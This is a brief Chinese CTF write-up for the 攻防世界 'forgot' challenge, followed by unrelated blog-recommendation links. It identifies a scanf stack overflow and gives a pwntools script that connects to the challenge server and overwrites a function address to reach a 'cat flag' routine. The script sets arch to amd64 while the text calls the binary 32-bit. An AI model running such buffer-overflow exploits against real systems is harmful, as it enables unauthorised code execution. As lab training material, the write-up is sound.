攻防世界2

forgot

发现是32位文件

fgets(s, 32, stdin)限制读入32位字符,无法利用

__isoc99_scanf("%s", v2) 典型的栈溢出

发现cat flag

覆盖v2-v3,覆盖为cat flag的函数地址

exp:

python 复制代码
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('61.147.171.105','56662')
door = 0x80486CC
io.recvuntil(b'>')
payload = b'aaaa'
io.sendline(payload)
io.recvuntil(b'>')
padding = b'a'*(0x74-0x54+0x4)
payload1 = padding + p32(door)
io.sendline(payload1)
io.interactive()
相关推荐
拳里剑气2 小时前
Linux:基础IO
linux·运维·服务器·io
小小龙学IT3 小时前
Day 2-3:Linux 文件与目录操作
linux
ruxshui3 小时前
数据运维生产故障案例笔记
大数据·运维
三8443 小时前
基本Linux命令总结
linux·运维·服务器
她叫我大水龙3 小时前
nginx 编译指南:静态编译 + 动态编译
运维·nginx
元岳数字人小元3 小时前
数字人系统源码:决定一体机长期运维稳定性的核心因素
运维·开源·人机交互·交互·源代码管理
田里的水稻3 小时前
EP_局域网传输音视频的主流方案
运维·人工智能·机器人·音视频
运维大师4 小时前
【Linux运维极简教程】11-防火墙与安全加固
运维·安全
hehelm4 小时前
AI 大模型接入 SDK —项目概述
linux·服务器·网络·数据库·c++
mounter6254 小时前
跨越鸿沟:从内核驱动开发到超大规模云端生产环境的思考
linux·驱动开发·linux kernel·kernel